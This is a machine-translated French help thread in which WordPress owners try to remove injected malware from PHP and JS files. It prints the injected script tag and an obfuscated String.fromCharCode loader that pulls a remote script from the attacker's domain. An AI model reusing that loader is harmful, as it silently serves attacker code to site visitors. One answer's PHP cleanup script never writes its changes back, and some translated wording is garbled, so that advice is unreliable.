web-dev-qa-db-fra.com

Supprimer la ligne de texte des logiciels malveillants de plusieurs fichiers sous Linux

Récemment, j'ai remarqué que tous mes sites WP ont injecté des logiciels malveillants dans tous les fichiers index.php. J'ai identifié le problème et le corrige, mais je ne peux pas supprimer les logiciels malveillants des fichiers. J'ai essayé cette commande:

find . -name "*.php" -exec sed -i 's/<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>><//' {} \;

mais je reçois une erreur:

find: argument manquant à `-exec '

donc je suppose que j'ai une erreur de syntaxe. Pouvez-vous s'il vous plaît me dire la commande exacte à supprimer dans tous les fichiers de cette ligne:

<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>
3
blagoj-357

Vérifiez si le plugin "super-socialat" existe et supprimez-le, il s'agit également d'un malware. Nous avons trouvé ce plugin sur tous les sites avec ce **** malware.

Et veuillez vérifier si adminer.php est téléchargé sur votre serveur. Il semble que ce soit leur administrateur qui utilise pour pirater les sites:

https://sansec.io/labs/2019/01/17/adminer-4.6.2-file-disclosure-vulnerability/https://www.foregenix.com/blog/grave-vulnérabilité-découverte-dans-l'administrateur-outil

1
endcoreCL

J'ai rencontré le même problème. Le script n'est pas dans un fichier, il est dans une base de données.

<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script>

Utilisez une meilleure recherche et remplacez le plugin pour le remplacer par un blanc.

0
tudou

j'ai le même problème

  1. j'ajoute 127.0.0.1 trasnaltemyrecords.com dans/etc/hosts

  2. grep -r * 'scripts.trasnaltemyrecords.com' > file_with_scripts.txt

  3. Avec ce script, je supprime cette injection

    $txt_file    = file_get_contents('file_with_scripts.txt');
    $rows        = explode("\n", $txt_file);
    array_shift($rows);
    foreach($rows as $row => $data)
    {
        $filename = $data ;
        $file = fopen($filename, 'rw');
        $contents = fread($file, filesize($filename));
        $new_content = preg_replace('/^<script(.*)script>/i', '', $contents);
        echo $new_content;
        fclose($file);
    }
    

Vérifiez votre base de données si vous utilisez ACF Vérifiez également cette rubrique dans Wordpress.org

https://wordpress.org/support/topic/malware-found-injected-script/

0
Sco

temp-crawl.php de wordpress provoque le problème.

j'ai des sites wp et php natifs sur le serveur. filer suspecte ré index. * ils ont cette ligne de script mentionnée ci-dessus

tous les fichiers .js sont également infectés.

et il y a un fichier dans le répertoire racine wp-craft-report-conf.php doit être supprimé.

alors il semble que tout fonctionne bien. au moins pour l'instant

0
OzdemirEmrah

Les fichiers JS sont également affectés.

L'Iran find -type f -mtime -1

et j'ai trouvé ce code ajouté à tous mes fichiers .js.

var gdjfgjfgj235f = 1; var d=document;var s=d.createElement('script');
s.type='text/javascript'; s.async=true; 
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
0
Pietro